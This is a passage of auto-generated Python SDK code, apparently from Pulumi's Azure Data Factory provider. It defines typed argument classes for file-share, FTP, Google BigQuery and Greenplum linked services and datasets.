return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to log on to the server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[Any]:
"""
User ID used to log on to the server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[Any]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class FileShareDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_filter: Optional[Any] = None,
file_name: Optional[Any] = None,
folder_path: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
An on-premises file system dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the file system.
:param pulumi.Input[str] description: Dataset description.
:param Any file_filter: Specify a filter to be used to select a subset of files in the folderPath rather than all files. Type: string (or Expression with resultType string).
:param Any file_name: The name of the file in the on-premises file system. Type: string (or Expression with resultType string).
:param Any folder_path: The path of the on-premises file system. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the files.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'FileShare')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_filter is not None:
pulumi.set(__self__, "file_filter", file_filter)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if folder_path is not None:
pulumi.set(__self__, "folder_path", folder_path)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the file system.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileFilter")
def file_filter(self) -> Optional[Any]:
"""
Specify a filter to be used to select a subset of files in the folderPath rather than all files. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_filter")
@file_filter.setter
def file_filter(self, value: Optional[Any]):
pulumi.set(self, "file_filter", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the file in the on-premises file system. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Optional[Any]:
"""
The path of the on-premises file system. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Optional[Any]):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class FtpServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_server_certificate_validation: Optional[Any] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
user_name: Optional[Any] = None):
"""
An FTP server linked service.
:param Any host: Host name of the FTP server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the FTP server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_server_certificate_validation: If true, validate the FTP server's SSL certificate when connecting over an SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any enable_ssl: If true, connect to the FTP server over an SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to log on to the FTP server.
:param Any port: The TCP port number that the FTP server uses to listen for client connections. Default value is 21. Type: integer (or Expression with resultType integer), minimum: 0.
:param Any user_name: Username used to log on to the FTP server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'FtpServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_server_certificate_validation is not None:
pulumi.set(__self__, "enable_server_certificate_validation", enable_server_certificate_validation)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def host(self) -> Any:
"""
Host name of the FTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the FTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableServerCertificateValidation")
def enable_server_certificate_validation(self) -> Optional[Any]:
"""
If true, validate the FTP server's SSL certificate when connecting over an SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_server_certificate_validation")
@enable_server_certificate_validation.setter
def enable_server_certificate_validation(self, value: Optional[Any]):
pulumi.set(self, "enable_server_certificate_validation", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
If true, connect to the FTP server over an SSL/TLS channel. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to log on to the FTP server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the FTP server uses to listen for client connections. Default value is 21. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username used to log on to the FTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class GoogleBigQueryLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
project: Any,
type: pulumi.Input[str],
additional_projects: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_id: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
email: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
key_file_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
refresh_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
request_google_drive_scope: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None):
"""
Google BigQuery service linked service.
:param pulumi.Input[str] authentication_type: The OAuth 2.0 authentication mechanism used for authentication. ServiceAuthentication can only be used on self-hosted IR.
:param Any project: The default BigQuery project to query against.
:param pulumi.Input[str] type: Type of linked service.
:param Any additional_projects: A comma-separated list of public BigQuery projects to access.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_id: The client ID of the Google application used to acquire the refresh token.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret of the Google application used to acquire the refresh token.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any email: The service account email ID that is used for ServiceAuthentication and can only be used on self-hosted IR.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any key_file_path: The full path to the .p12 key file that is used to authenticate the service account email address and can only be used on self-hosted IR.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] refresh_token: The refresh token obtained from Google for authorizing access to BigQuery for UserAuthentication.
:param Any request_google_drive_scope: Whether to request access to Google Drive. Allowing Google Drive access enables support for federated tables that combine BigQuery data with data from Google Drive. The default value is false.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "project", project)
pulumi.set(__self__, "type", 'GoogleBigQuery')
if additional_projects is not None:
pulumi.set(__self__, "additional_projects", additional_projects)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if email is not None:
pulumi.set(__self__, "email", email)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if key_file_path is not None:
pulumi.set(__self__, "key_file_path", key_file_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if refresh_token is not None:
pulumi.set(__self__, "refresh_token", refresh_token)
if request_google_drive_scope is not None:
pulumi.set(__self__, "request_google_drive_scope", request_google_drive_scope)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The OAuth 2.0 authentication mechanism used for authentication. ServiceAuthentication can only be used on self-hosted IR.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def project(self) -> Any:
"""
The default BigQuery project to query against.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Any):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalProjects")
def additional_projects(self) -> Optional[Any]:
"""
A comma-separated list of public BigQuery projects to access.
"""
return pulumi.get(self, "additional_projects")
@additional_projects.setter
def additional_projects(self, value: Optional[Any]):
pulumi.set(self, "additional_projects", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client ID of the Google application used to acquire the refresh token.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret of the Google application used to acquire the refresh token.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def email(self) -> Optional[Any]:
"""
The service account email ID that is used for ServiceAuthentication and can only be used on self-hosted IR.
"""
return pulumi.get(self, "email")
@email.setter
def email(self, value: Optional[Any]):
pulumi.set(self, "email", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="keyFilePath")
def key_file_path(self) -> Optional[Any]:
"""
The full path to the .p12 key file that is used to authenticate the service account email address and can only be used on self-hosted IR.
"""
return pulumi.get(self, "key_file_path")
@key_file_path.setter
def key_file_path(self, value: Optional[Any]):
pulumi.set(self, "key_file_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="refreshToken")
def refresh_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The refresh token obtained from Google for authorizing access to BigQuery for UserAuthentication.
"""
return pulumi.get(self, "refresh_token")
@refresh_token.setter
def refresh_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "refresh_token", value)
@property
@pulumi.getter(name="requestGoogleDriveScope")
def request_google_drive_scope(self) -> Optional[Any]:
"""
Whether to request access to Google Drive. Allowing Google Drive access enables support for federated tables that combine BigQuery data with data from Google Drive. The default value is false.
"""
return pulumi.get(self, "request_google_drive_scope")
@request_google_drive_scope.setter
def request_google_drive_scope(self, value: Optional[Any]):
pulumi.set(self, "request_google_drive_scope", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@pulumi.input_type
class GoogleBigQueryObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Google BigQuery service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset. Expected value is 'GoogleBigQueryObject'.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'GoogleBigQueryObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset. Expected value is 'GoogleBigQueryObject'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class GreenplumLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Greenplum Database linked service.
:param pulumi.Input[str] type: Type of linked service. Expected value is 'Greenplum'.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Greenplum')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service. Expected value is 'Greenplum'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class GreenplumTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
